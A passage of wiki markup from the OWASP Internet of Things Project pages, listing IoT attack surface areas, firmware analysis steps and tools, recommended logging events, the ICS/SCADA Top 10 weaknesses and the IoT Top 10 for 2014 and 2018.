| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
== Firmware Security Testing Methodology ==<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and Information Security professionals with conducting firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relative technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Attain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}<br />
The full{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255232OWASP Internet of Things Project2019-10-04T18:01:51Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides, Tools, and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
